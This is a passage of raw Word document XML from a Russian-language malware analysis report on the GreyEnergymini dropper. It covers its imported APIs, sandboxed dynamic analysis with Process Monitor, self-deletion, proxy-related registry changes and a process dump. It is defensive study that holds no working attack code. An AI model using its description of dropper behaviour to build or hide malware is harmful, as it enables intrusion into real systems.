        </w:rPr>
        <w:t>TokenInformation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B76B01"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4u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515DA73C" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115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SetTokenInformation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v4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TokenIntegrityLevel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v22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v7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10E57E25" w14:textId="51E255DD" w:rsidR="00D27562" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateProcessAsUserA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v5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LPCSTR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27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data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27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPSTR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27562">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="50A14F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"min"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27562">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27562">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="383A42"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304D7EC" w14:textId="3AE9D401" w:rsidR="00754A40" w:rsidRDefault="00754A40" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3776F36B" w14:textId="28052652" w:rsidR="00754A40" w:rsidRDefault="00754A40" w:rsidP="00754A40">
      <w:r>
        <w:t xml:space="preserve">Однако в импортируемых функциях не найдено никаких сетевых функций или загрузок сетевых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00754A40">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Значит, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="00754A40">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00754A40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>представляет собой загрузчик-дроппер</w:t>
      </w:r>
      <w:r w:rsidR="001F2531" w:rsidRPr="001F2531">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001F2531">
        <w:t xml:space="preserve">с функциями сбора информации о системе – видно по многочисленным </w:t>
      </w:r>
      <w:r w:rsidR="001F2531">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="001F2531" w:rsidRPr="001F2531">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F2531">
        <w:t>функциям, запрашивающим информацию о системе)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не </w:t>
      </w:r>
      <w:r w:rsidR="001F2531">
        <w:t>полноценный</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> бэкдор.</w:t>
      </w:r>
      <w:r w:rsidR="00724CAF">
        <w:t xml:space="preserve"> Т.е. необходимо провести динамический анализ, чтоб рассмотреть непосредственно загружаемые им файлы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E21E53" w14:textId="31EB0ED9" w:rsidR="009137A3" w:rsidRDefault="001F2531" w:rsidP="009137A3">
      <w:r>
        <w:t xml:space="preserve">Для этого перед запуском </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="001F2531">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001F2531">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>на виртуальной машине</w:t>
      </w:r>
      <w:r w:rsidR="009137A3" w:rsidRPr="009137A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009137A3">
        <w:t xml:space="preserve">в утилите </w:t>
      </w:r>
      <w:r w:rsidR="009137A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidR="009137A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009137A3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidR="009137A3" w:rsidRPr="009137A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009137A3">
        <w:t>были настроены фильтры, представленные на рисунке 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F97FDC" w14:textId="77777777" w:rsidR="009137A3" w:rsidRDefault="009137A3" w:rsidP="009137A3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B16659">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CEFCDFE" wp14:editId="1E85C4B9">
            <wp:extent cx="2514600" cy="18519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5407" cy="18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7063" w14:textId="4E73F772" w:rsidR="00C819B4" w:rsidRPr="009137A3" w:rsidRDefault="009137A3" w:rsidP="009137A3">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009137A3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9137A3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12</w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Установленные в </w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE55F5D" w14:textId="77777777" w:rsidR="00D27562" w:rsidRPr="00754A40" w:rsidRDefault="00D27562" w:rsidP="00D27562">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="928" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5610B340" w14:textId="77777777" w:rsidR="0047238C" w:rsidRDefault="009137A3" w:rsidP="0047238C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Через несколько секунд после запуска программы файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009137A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">самоудаляется. Однако, выполняемые ей действия можно отследить </w:t>
      </w:r>
      <w:r w:rsidR="0047238C">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="0047238C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process Monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4702E8D2" w14:textId="77777777" w:rsidR="0047238C" w:rsidRDefault="00E416B2" w:rsidP="0047238C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00E416B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EFD288F" wp14:editId="73B065F2">
            <wp:extent cx="5188527" cy="24381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0879" cy="24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F940" w14:textId="7E039605" w:rsidR="0047238C" w:rsidRPr="001822CB" w:rsidRDefault="0047238C" w:rsidP="0047238C">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Отслеживание действий </w:t>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergymini</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0047238C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CFD7D" w14:textId="16FF0DCF" w:rsidR="0047238C" w:rsidRPr="001822CB" w:rsidRDefault="0047238C" w:rsidP="0047238C">
      <w:r>
        <w:t xml:space="preserve">С рисунка 13 видно, </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t>что,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как и было описано в отчете онлайн-песочницы</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t>, программа изменяет значения ключей реестра для проверки уровня</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t xml:space="preserve"> предупреждения о перенаправлении безопасного трафика на небезопасный</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t xml:space="preserve"> и изменения настроек прокси-сервера. Затем создает файл </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t xml:space="preserve">для подключения динамических библиотек. Можно увидеть, что при попытке создания файла - </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t>{D7382DDA-743F-4817-AB47-C495DEDE2C20}</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t xml:space="preserve"> (предположительно, того самого, что онлайн-песочница пометила как вредоносный исполняемый) возвращался результат </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Found</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:t xml:space="preserve">Однако при дальнейшем анализе действий в системе после запуска файла (см. рисунок 14) видно, что этот же файл успешно создается процессом </w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001822CB" w:rsidRPr="001822CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001822CB">
        <w:t>На рисунке 15 видно, что именно этот процесс также отвечает за сетевое взаимодействие (установка ключей реестра, связанных с сетевым взаимодействием).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41137295" w14:textId="77777777" w:rsidR="00DA3AA4" w:rsidRDefault="00E416B2" w:rsidP="001822CB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E416B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FC59297" wp14:editId="232ABFA9">
            <wp:extent cx="4617150" cy="31699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8252" cy="317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8FF4" w14:textId="5D03D0A4" w:rsidR="00DA3AA4" w:rsidRPr="00DA3AA4" w:rsidRDefault="00DA3AA4" w:rsidP="00DA3AA4">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CC19CF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Действия процесса </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA3AA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1DA9A" w14:textId="77777777" w:rsidR="001822CB" w:rsidRDefault="00E416B2" w:rsidP="001822CB">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E416B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C5A9CC4" wp14:editId="1D4E9546">
            <wp:extent cx="5326779" cy="25069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052" cy="250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53B1" w14:textId="34DE1508" w:rsidR="00D27562" w:rsidRPr="001822CB" w:rsidRDefault="001822CB" w:rsidP="001822CB">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001822C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822CB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15</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Действия процесса </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3525E7E9" w14:textId="2E5F660A" w:rsidR="00A8138A" w:rsidRPr="001822CB" w:rsidRDefault="001822CB" w:rsidP="00643131">
      <w:r>
        <w:t xml:space="preserve">Для более детального изучения с помощью утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>см. рисунок 16) был найден этот процесс и извлечен его дамп.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4436C1D8" w14:textId="77777777" w:rsidR="001822CB" w:rsidRDefault="007A4426" w:rsidP="001822CB">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007A4426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6FD120" wp14:editId="3F6D6FC1">
            <wp:extent cx="4823460" cy="36268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62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E0DA" w14:textId="2D612476" w:rsidR="00816055" w:rsidRPr="00345FEC" w:rsidRDefault="001822CB" w:rsidP="001822CB">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001822C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822CB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16</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Процесс </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rundll</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE07BC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE07BC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE07BC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001822CB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
